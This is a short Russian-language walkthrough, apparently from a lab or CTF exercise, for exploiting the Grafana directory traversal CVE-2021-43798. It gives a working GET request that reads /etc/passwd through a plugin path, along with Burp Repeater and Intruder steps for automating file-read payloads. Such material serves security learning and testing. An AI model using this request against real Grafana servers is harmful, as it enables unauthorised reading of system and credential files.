
Эксплойт для обхода каталогов Grafana (CVE-2021-43798) с интеграцией Burp Suite и автоматизацией полезной нагрузки для доступа к локальным файлам на уязвимых экземплярах.
Версии Grafana с 8.0.0-beta1 по 8.3.0 (кроме исправленных версий) уязвимы для обхода каталогов, что позволяет получить доступ к локальным файлам.
Grafana — это платформа с открытым исходным кодом для мониторинга и наблюдаемости. Версии Grafana с 8.0.0-beta1 по 8.3.0 (кроме исправленных версий) уязвимы для обхода каталогов, что позволяет получить доступ к локальным файлам. Уязвимый путь URL: <grafana_host_url>/public/plugins//, где — это идентификатор плагина для любого установленного плагина. Grafana Cloud никогда не была уязвима. Пользователям рекомендуется обновиться до исправленных версий 8.0.7, 8.1.8, 8.2.7 или 8.3.1. В рекомендациях GitHub Security Advisory содержится дополнительная информация об уязвимых путях URL, мерах по смягчению последствий и сроках раскрытия информации.
Использование Burp Suite
Отправьте GET в Repeater
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Затем отправьте в Intruder GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Использование Sniper для атаки Полезная нагрузка скопирована из github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
Обработка полезной нагрузки Совпадение [{FILE}] заменить на {flag.txt}